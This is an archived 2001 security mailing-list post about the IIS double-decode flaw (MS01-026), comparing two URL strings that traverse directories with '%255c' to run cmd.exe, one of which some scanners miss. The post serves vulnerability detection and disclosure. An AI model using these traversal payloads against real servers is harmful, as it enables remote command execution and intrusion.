Hi all. Strange thing with double decode problem on IIS. Refer: http://www.microsoft.com/technet/security/bulletin/MS01-026.asp Most scanners (including the Nessus plugin) checks for the problem using the following string: /directory/..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir replace directory with an executable directory, and replace %255c with any combination of the double encoded string. It seems to work fine (I have seen this as the only vulnerability on a box and the scanner picks it up nicely) However...I have found two boxes (one IISv4 and one IISv5) where it does not work...the weird thing is this - the following string: /directory/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir DOES work. The only difference is the ../ in front of /winnt/system32/blah. A note - if you are using a scanner that only checks for the first string - please update - your site might be vulnerable. Arirang scanner does this check properly. Why is this so? Are there two different problems here? Any comments? Regards, Roelof.
This archive was generated by hypermail 2b30 : Wed Jul 04 2001 - 12:38:57 PDT